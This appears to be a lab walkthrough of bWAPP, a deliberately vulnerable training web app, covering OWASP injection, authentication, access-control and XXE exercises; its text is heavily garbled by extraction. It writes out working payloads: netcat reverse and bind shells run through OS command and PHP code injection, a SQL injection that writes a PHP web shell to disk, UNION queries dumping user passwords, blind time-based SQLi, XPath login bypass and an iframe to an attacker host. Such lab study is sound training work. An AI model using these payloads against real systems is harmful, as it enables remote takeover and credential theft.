bWAPP bWAPP - Sanjiv Sanjiv Kawa Kawa April 2, 2015
10:37 AM
/ A1 - Injection Injection / HTML Injection Injection - Reflected (GET) HTML Injection Injection - Reflected (POST) HTML Injection - Reflected (Current (Current URL) HTML Injection Injection - Stored (Blog) (Blog) iFrame Injection LDAP Injection (Search) Mail Header Injection (SMTP) OS Command Injection OS Command Command Injection - Blind PHP Code Injection Server-Side Includes (SSI) Injection SQL Injection (GET/Search) SQL Injection (GET/Select) SQL Injection (POST/Search) SQL Injection (POST/Select) SQL Injection (AJAX/JSON/jQuery) (AJAX/JSON/jQuery) SQL Injection (CAPTCHA) SQL Injection (Login Form/Hero) SQL Injection (Login Form/User) SQL Injection (SQLite) SQL Injection (Drupal) SQL Injection Injection - Stored (Blog) (Blog) SQL Injection Injection - Stored (SQLite) (SQLite) SQL Injection - Stored (User-Agent) (User-Agent) SQL Injection Injection - Stored Stored (XML) SQL Injectio Injection n - Blind - BooleanBoolean-Base Based d SQL Injectio Injection n - Blind - Time-Base Time-Based d SQL Injection Injection - Blind (SQLite) (SQLite) SQL Injection - Blind (Web Services/SOAP) Services/SOAP) XML/XPath Injection (Login Form) XML/XPath Injection (Search) / A2 - Broken Auth. & Session Session Mgmt. / Broken Authentication Authentication - CAPTCHA Bypassing Broken Authentication Authentication - Forgotten Function Broken Authentication Authentication - Insecure Login Forms Broken Authentication Authentication - Logout Management Management Broken Authentication Authentication - Password Attacks Attacks Broken Authentication Authentication - Weak Passwords Passwords Session Management Management - Administrative Portals Session Management Management - Cookies (HTTPOnly) (HTTPOnly) Session Management Management - Cookies (Secure) (Secure) Session Management Management - Session ID in URL Session Management Management - Strong Sessions Sessions / A3 - Cross-Site Scripting Scripting (XSS) / Cross-Site Scripting - Reflected (GET) Cross-Site Scripting - Reflected (POST) Cross-Site Scripting Scripting - Reflected (JSON) (JSON) Cross-Site Scripting - Reflected (AJAX/JSON) (AJAX/JSON)
bWAPP P
1
Cross-Site Scripting Scripting - Reflected (AJAX/XML) (AJAX/XML) Cross-Site Scripting - Reflected (Back (Back Button) Cross-Site Scripting - Reflected (Custom (Custom Header) Header) Cross-Site Scripting - Reflected (Eval) Cross-Site Scripting - Reflected (HREF) Cross-Site Scripting - Reflected (Login (Login Form) Cross-Site Scripting Scripting - Reflected (phpMyAdmin) (phpMyAdmin) Cross-Site Scripting Scripting - Reflected (PHP_SELF) (PHP_SELF) Cross-Site Scripting - Reflected (Referer) Cross-Site Scripting Scripting - Reflected (User-Agent) (User-Agent) Cross-Site Scripting - Stored (Blog) Cross-Site Scripting Scripting - Stored (Change (Change Secret) Cross-Site Scripting - Stored (Cookies) Cross-Site Scripting Scripting - Stored (SQLiteManager) (SQLiteManager) Cross-Site Scripting - Stored (User-Agent) / A4 - Insecure Direct Object Object References / Insecure DOR (Change Secret) Insecure DOR (Reset Secret) Insecure DOR (Order Tickets) / A5 - Security Misconfiguration Misconfiguration / Arbitrary File Access (Samba) Cross-Domain Policy File (Flash) Cross-Origin Resource Sharing (AJAX) Cross-Site Tracing (XST) Denial-of-Service (Large Chunk Size) Denial-of-Service (Slow HTTP DoS) Denial-of-Service (SSL-Exhaustion) Denial-of-Service (XML Bomb) Insecure FTP Configuration Insecure SNMP Configuration Insecure WebDAV Configuration Local Privilege Escalation (sendpage) Local Privilege Escalation (udev) Man-in-the-Middle Attack (HTTP) Man-in-the-Middle Attack (SMTP) Old/Backup & Unreferenced Files Robots File / A6 - Sensitive Sensitive Data Data Exposure Exposure / Base64 Encoding (Secret) BEAST/CRIME/BREACH BEAST/CRIME/BREACH Attacks Clear Text HTTP (Credentials) Heartbleed Vulnerability Host Header Attack (Reset Poisoning) HTML5 Web Storage (Secret) POODLE Vulnerability SSL 2.0 Deprecated Protocol Text Files (Accounts) / A7 - Missing Functional Functional Level Access Control / Directory Traversal - Directories Directory Directory Traversal Traversal - Files Host Header Attack (Cache Poisoning) Host Header Attack (Reset Poisoning) Local File Inclusion (SQLiteManager)
bWAPP Page 2
Remote & Local File Inclusion (RFI/LFI) Restrict Device Access Restrict Folder Access Server Side Request Forgery (SSRF) XML External Entity Attacks (XXE) / A8 - Cross-Site Request Request Forgery (CSRF) (CSRF) / Cross-Site Request Forgery (Change Password) Cross-Site Request Forgery (Change Secret) Cross-Site Request Forgery (Transfer Amount) / A9 - Using Known Vulnerable Vulnerable Components / Buffer Overflow (Local) Buffer Overflow (Remote) Drupal SQL Injection (Drupageddon) Heartbleed Vulnerability PHP CGI Remote Code Execution PHP Eval Function phpMyAdmin BBCode Tag XSS Shellshock Vulnerability (CGI) SQLiteManager Local File Inclusion SQLiteManager PHP Code Injection SQLiteManager XSS / A10 - Unvalidated Redirects Redirects & Forwards Forwards / Unvalidated Redirects & Forwards (1) Unvalidated Redirects & Forwards (2) / Other bugs... / ClickJacking (Movie Tickets) Client-Side Validation (Password) HTTP Parameter Pollution HTTP Response Splitting HTTP Verb Tampering Information Disclosure - Favicon Information Disclosure - Headers Information Disclosure - PHP version Information Disclosure - Robots File Insecure iFrame (Login Form) Unrestricted File Upload ---------------------------------------------------- Extras -------------------------------------------------A.I.M. - No-authentication No-authentication Mode Client Access Policy File Cross-Domain Policy File Evil 666 Fuzzing Page Manual Intervention Required! Unprotected Admin Portal We Steal Secrets... (html) We Steal Secrets... (plain) WSDL File (Web Services/SOAP)
bWAPP P
3
A1: Injection March 31, 2015
9:03 AM
Areas with an asterix next to them have not been listed in this walkthough. HTML Injection Injection - Reflected (GET) HTML Injection Injection - Reflected (POST) HTML Injection - Reflected (Current (Current URL) HTML Injection Injection - Stored (Blog) (Blog) iFrame Injection OS Command Injection OS Command Command Injection - Blind PHP Code Injection Server-Side Includes (SSI) Injection SQL Injection (GET/Search) SQL Injection (GET/Select) SQL Injection (POST/Search) SQL Injection (POST/Select) SQL Injection (Login Form/Hero) SQL Injection (SQLite) SQL Injection (Drupal) SQL Injection Injection - Stored (Blog) (Blog) SQL Injection Injection - Stored (SQLite) (SQLite) SQL Injection - Stored (User-Agent) (User-Agent) SQL Injectio Injection n - Blind - BooleanBoolean-Base Based d SQL Injectio Injection n - Blind - Time-Base Time-Based d XML/XPath Injection (Login Form) *LDAP Injection (Search) *Mail Header Injection (SMTP) *SQL Injection (AJAX/JSON/jQuery) (AJAX/JSON/jQuery) *SQL Injection (CAPTCHA) *SQL Injection (Login Form/User) *SQL Injection Injection - Stored Stored (XML) *SQL Injection Injection - Blind (SQLite) (SQLite) *SQL Injection - Blind (Web Services/SOAP) Services/SOAP) *XML/XPath Injection (Search)
bWAPP P
4
HTML Injecti Injection on - Reflected Reflected (GET) (GET) March 31, 2015
9:03 AM
HTML Injection Injection - Reflected (GET)
(GET)
http://192.168.254.131/bWAPP/htmli_ge http://192.168.254.131/bWA PP/htmli_get.php?firstname=< t.php?firstname=
&lastname=
&lastname=blah
&f >blah
&form=submit orm=submit
bWAPP P
5
HTML Injecti Injection on - Reflected Reflected (POST) (POST) March 31, 2015
9:08 AM
bWAPP P
6
firstname=
&lastname=
&lastname= > blah
&form=submit
bWAPP P
7
HTML Injecti Injection on - Reflected Reflected (URL) (URL) March 31, 2015
9:11 AM
bWAPP P
8
bWAPP P
9
HTML Injection Injection - Stored (Blog) (Blog) March 31, 2015
9:16 AM
<iframe class="code"><iframe SRC="http://attackerIP/blah" SRC="http://attackerIP/blah" height="0" width="0">
width="0">
bWAPP P
10
test
class="code">test
Session Expired, Please Login:
bWAPP P
11
bWAPP P
12
iFrame Injection March 31, 2015
9:42 AM
http://192.168.254.131/bWAPP/iframei.php?ParamUrl=http://www.hello.com/&ParamWidth=500 &ParamHeight=500
bWAPP P
13
bWAPP P
14
OS Command Injection March 31, 2015
10:47 AM AM
www.nsa.gov && nc -vn 192.168.254.128 192.168.254.128 4444 -e /bin/bash
bWAPP P
15
; whoami
bWAPP P
16
OS Command Injection (Blind) March 31, 2015
11:07 AM AM
bWAPP P
17
192.168.254.128 192.168.254.128 && nc -vn 192.168.254.128 4444 -e /bin/bash
http://thehackpot.blogspot.ca/20 http://thehackpot.blog spot.ca/2014/05/blind-o 14/05/blind-os-comma s-command-injection-atta nd-injection-attacks.html cks.html
bWAPP P
18
PHP Code Injection March 31, 2015
11:29 AM AM
bWAPP P
19
message=1; phpinfo()
bWAPP P
20
bWAPP P
21
phpi.php?message=""; phpi.php?message=""; system('nc -lvp 1234 -e /bin/bash')
bWAPP P
22
Server Side Include (SSI) Injection March 31 31, 20 2015
11:50 AM AM
bWAPP Page 23
connect to me on port 8888!
bWAPP Page 24
SQLi (GET/Search) March 31, 2015
11:53 AM AM
bWAPP P
25
bWAPP P
26
sqli_1.php?title='&action=search
bWAPP P
27
sqli_1.php?title=iron' or 1=1#&action=search 1=1#&action=search
bWAPP P
28
sqli_1.php?title=validEntry' or 1=2#&action=search 1=2#&action=search
sqli_1.php?title=iron' union select 1,2,3,4,5,6,7 #&action=search #&action=search
bWAPP P
29
sqli_1.php?title=iron' union select 1,user(),@@version,4,5,6,7 #&action=search
iron' union select 1,login,password,email,5,6,7 1,login,password,email,5,6,7 from users # sqli_1.php?title=iron' union select 1,"",3,4,5 shell_exec($_GET['cmd'])?>",3,4,5,6,7 ,6,7 into OUTFILE '/var/www/bWAPP/popped.php' '/var/www/bWAPP/popped.php' #&action=search
bWAPP P
30
Select * from movies where title like 'iron'
bWAPP Page 31
SQLi (GET/Select) March 31, 2015
12:35 PM PM
sqli_2.php?movie=1 and 1=2#&action=go
bWAPP P
32
sqli_2.php?movie=1 union select 1,2,3,4,5,6#&action=go 1,2,3,4,5,6#&action=go
sqli_2.php?movie=1 union select 1,2,3,4,5,6,7#&action=go 1,2,3,4,5,6,7#&action=go
bWAPP P
33
sqli_2.php?movie=1337 sqli_2.php?movie=1337 union select 1,2,3,4,5,6,7#&action=go 1,2,3,4,5,6,7#&action=go
sqli_2.php?movie=1337 sqli_2.php?movie=1337 union select 1,login,3,email,password,6,7 from users#&action=go
bWAPP P
34
SQLi (POST/Search) March 31, 2015
1:07 PM
bWAPP P
35
bWAPP P
36
bWAPP P
37
bWAPP P
38
SQLi (POST/Select) March 31, 2015
1:06 PM
bWAPP P
39
SQLi (Login Form/Hero) March 31, 2015
2:48 PM
'
bWAPP P
40
login=' or 1=1#&password=&form=subm 1=1#&password=&form=submit it
bWAPP P
41
bWAPP P
42
SQLi Stored (Blog) March 31, 2015
3:34 PM
bWAPP P
43
test','test')#
bWAPP P
44
bWAPP P
45
canary1','canary2')#
bWAPP P
46
canary1',(select password password from mysql.user where user='root' limit 0,1))#
bWAPP P
47
canary1',(select version()))# canary1',(select user()))#
bWAPP P
48
SQLi Stored (User-Agent) March 31, 2015
3:56 PM
bWAPP Page 49
bWAPP Page 50
bWAPP Page 51
SQLi Blind (Boolean Based) April 1, 2015
9:31 AM
This can be leveraged in conjunction with the substring function to identify i dentify table names based on true/false responses
bWAPP P
52
SQLi Blind (Time Based) April 1, 2015
9:35 AM
test'-IF(MID(VERSION(),1,1) test'-IF(MID(VERSION(),1,1) = '5', SLEEP(5), 0)#
bWAPP P
53
XML/XPATH Injection (Login Form) April 1, 2015
10:14 AM
Intercept responses http://pastebin.com/index/uT6zQGVx
$login = $_REQUEST["login"]; $_REQUEST["login"]; $login = xmli($login); $password = $_REQUEST["password"]; $_REQUEST["password"]; $password = xmli($password); // Loads the XML file $xml = simplexml_load_file("passwords simplexml_load_file("passwords/heroes.xml") /heroes.xml");; // XPath search $result = $xml->xpath("/heroes/hero[lo $xml->xpath("/heroes/hero[login='" gin='" . $login . "' and password='" . $password . "']"); [login='" . $login . "' and password='" . $password . "'] [login='' and password=''] [login='whatever'' and password='']
bWAPP P
54
[login='whatever' or 1=1' and password=''] [login='whatever' or 1=1 or '' and password=''] whatever' or 1=1 or '
bWAPP P
55
A2: Broken Authentication April 1, 2015
3:24 PM
Areas with an asterix next to them have not been listed in this walkthough. Broken Authentication Authentication - Insecure Login Forms Broken Authentication Authentication - Logout Management Management Session Management Management - Administrative Portals
*Broken Authentication Authentication - CAPTCHA Bypassing *Broken Authentication Authentication - Forgotten Function *Broken Authentication Authentication - Password Attacks Attacks *Broken Authentication Authentication - Weak Passwords Passwords *Session Management Management - Cookies (HTTPOnly) (HTTPOnly) *Session Management Management - Cookies (Secure) (Secure) *Session Management Management - Session ID in URL URL *Session Management Management - Strong Sessions Sessions
bWAPP P
56
BA - Insecur Insecure e Login Login Form Form April 1, 2015
3:25 PM
bWAPP P
57
BA - Logout Logout Manag Manageme ement nt April 1, 2015
3:26 PM
bWAPP P
58
BA - Session Session Mana Managem gement ent April 1, 2015
3:31 PM
bWAPP P
59
bWAPP P
60
A4: Insecure Direct Object References April 1, 2015
3:46 PM
Areas with an asterix next to them have not been listed in this walkthough. Insecure DOR (Change Secret) Insecure DOR (Order Tickets) *Insecure DOR (Reset Secret)
bWAPP P
61
Insecure Direct Object Reference (Change Secret) April 1, 2015
3:42 PM
Bee can be changed to bob
bWAPP P
62
bWAPP P
63
Insecure Direct Object Reference (Order Ticket) April 1, 2015
3:51 PM
bWAPP P
64
bWAPP P
65
A6: Sensitive Data Exposure April 2, 2015
9:15 AM
Areas with an asterix next to them have not been listed in this walkthough. Base64 Encoding (Secret) HTML5 Web Storage (Secret) *BEAST/CRIME/BREACH *BEAST/CRIME/BREACH Attacks *Clear Text HTTP (Credentials) *Heartbleed Vulnerability *Host Header Attack (Reset Poisoning) *POODLE Vulnerability *SSL 2.0 Deprecated Protocol *Text Files (Accounts)
bWAPP P
66
Base64 Encoding April 2, 2015
9:15 AM
bWAPP P
67
HTML5 Web Storage April 2, 2015
9:16 AM
bWAPP P
68
bWAPP P
69
A7: Missing Functional Level Access Control April 1, 2015
4:06 PM
Areas with an asterix next to them have not been listed in this walkthough. Directory Directory Traversal Traversal - Files Host Header Attack (Cache Poisoning) Remote & Local File Inclusion (RFI/LFI) Restrict Device Access XML External Entity Attacks (XXE) *Directory Traversal - Directories *Host Header Attack (Reset Poisoning) *Local File Inclusion (SQLiteManager) *Restrict Folder Access *Server Side Request Forgery (SSRF)
bWAPP P
70
Directory Traversal (Directories) April 1, 2015
4:07 PM
bWAPP P
71
bWAPP P
72
Directory Traversal (Files) Wednesday, April 1, 20 2015
7:48 7: 48 PM
bWAPP P
73
bWAPP P
74
Host Header Attack (Cache Poisoning) Wednesday, April 1, 20 2015
8:02 8: 02 PM
bWAPP P
75
bWAPP P
76
bWAPP P
77
bWAPP P
78
bWAPP P
79
Remote and Local File Inclusion Wednesday, April 1, 20 2015
8:27 8: 27 PM
bWAPP P
80
bWAPP P
81
bWAPP P
82
bWAPP P
83
bWAPP P
84
Restrict Device Access Wednesday, April 1, 20 2015
8:38 8: 38 PM
Mozilla/5.0(iPhone;U;CPUiPhon Mozilla/5.0(iPhone;U;CPUiPhoneOS4_0likeMa eOS4_0likeMacOSX;en-us)Ap cOSX;en-us)AppleWebKit/532 pleWebKit/532.9(KHTML,likeGec .9(KHTML,likeGecko) ko) Version/4.0.5Mobile/8A293Saf Version/4.0.5Mobile/8A293Safari/6531.22 ari/6531.22.7 .7
bWAPP P
85
bWAPP P
86
XML External Entity Attacks (XXE) April 2, 2015
8:24 AM
bWAPP P
87
]>
&popped;&popped;Any cret>Any bugs? bugs?
bWAPP P
88
]>
&popped;&popped;Any cret>Any bugs? bugs?
bWAPP P
89
bWAPP P
90
Extras: PHP Eval() April 2, 2015
1:38 PM
http://www.exploit-db.com/papers/13694/ http://insecurety.net/?p=705
bWAPP P
91